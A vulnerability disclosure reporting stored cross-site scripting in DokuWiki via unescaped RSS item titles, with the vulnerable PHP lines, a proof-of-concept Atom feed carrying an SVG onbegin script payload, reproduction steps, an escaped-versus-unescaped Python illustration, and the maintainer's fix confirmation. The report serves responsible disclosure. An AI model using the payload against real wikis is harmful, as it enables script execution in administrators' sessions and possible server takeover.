Stored cross-site scripting via RSS feed in splitbrain/dokuwiki

Valid

Reported on

May 13th 2023


Description

Because inc/parser/xhtml.php appends RSS item titles to the page output without HTML-escaping them, a malicious RSS feed can be used to inject arbitrary HTML elements into the page, resulting in cross-site scripting.

inc/parser/xhtml.php, lines 1292-1294:

                } else {
                    $this->doc .= ' '.$item->get_title();
                }

Proof of Concept

<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-US">
    <title type="text">test</title>
    <entry>
        <title type="html"><![CDATA[<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s></animate></svg>]]></title>
    </entry>
</feed>
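An added illustration (not code from the report or from DokuWiki) that parses the proof-of-concept feed above and places the vulnerable concatenation pattern beside its hardened form; html.escape() stands in for DokuWiki's hsc() helper, which is an assumption of this example.

```python
import html
import xml.etree.ElementTree as ET

ATOM_NS = "{http://www.w3.org/2005/Atom}"

# Constructed sample input: the Atom document from the proof of concept above.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-US">
    <title type="text">test</title>
    <entry>
        <title type="html"><![CDATA[<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s></animate></svg>]]></title>
    </entry>
</feed>"""


def entry_titles(feed_xml: str) -> list[str]:
    """Return the raw text of every <entry><title> in an Atom feed.

    Like a feed parser's get_title(), this hands back whatever the feed author
    supplied; a type="html" title can legitimately contain markup, so the
    value is attacker-controlled from the wiki's point of view.
    """
    root = ET.fromstring(feed_xml.encode("utf-8"))
    return [t.text or "" for t in root.iterfind(f"{ATOM_NS}entry/{ATOM_NS}title")]


def render_titles_vulnerable(feed_xml: str) -> str:
    """Mirror of the unsafe pattern: the title is concatenated into the page as-is."""
    doc = ""
    for title in entry_titles(feed_xml):
        doc += " " + title  # feed-controlled HTML lands in the page unescaped
    return doc


def render_titles_fixed(feed_xml: str) -> str:
    """Hardened form: escape the feed-controlled title before it reaches the page.

    html.escape() plays the role of hsc() here (assumption); the browser then
    renders the markup as visible text instead of creating elements.
    """
    doc = ""
    for title in entry_titles(feed_xml):
        doc += " " + html.escape(title, quote=True)
    return doc


def contains_markup(rendered: str) -> bool:
    """Regression check for a test suite: does rendered output still carry raw tags?"""
    return "<" in rendered and ">" in rendered
```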

Steps to reproduce

1. Write the following content to a page (the URL serves the PoC feed above):

{{rss>https://ry0tak.github.io/8941fbce9a754868b279b57d01dc6ef1cb9c74621b864edeb3d79b5f6a6ec375/poc.xml}}

2. Confirm that alert(document.domain) is executed after saving the page.

Impact

An attacker can execute arbitrary JavaScript on the DokuWiki origin. Since administrators can install plugins, this could result in remote code execution if an administrator opens a page with crafted content.

Andreas Gohr
7 months ago

Maintainer


Thanks for the report. Fix is in progress https://github.com/dokuwiki/dokuwiki/pull/3967

Andreas Gohr validated this vulnerability 7 months ago
RyotaK has been awarded the disclosure bounty
Andreas Gohr marked this as fixed in 2023-04-04a with commit 53df38 7 months ago
Andreas Gohr has been awarded the fix bounty
This vulnerability will not receive a CVE
Andreas Gohr published this vulnerability 7 months ago
xhtml.php#L1292-L1294 has been validated
RyotaK
7 months ago

Researcher


Hi @splitbrain, thank you so much for fixing this issue! Can you please assign a CVE ID for this?
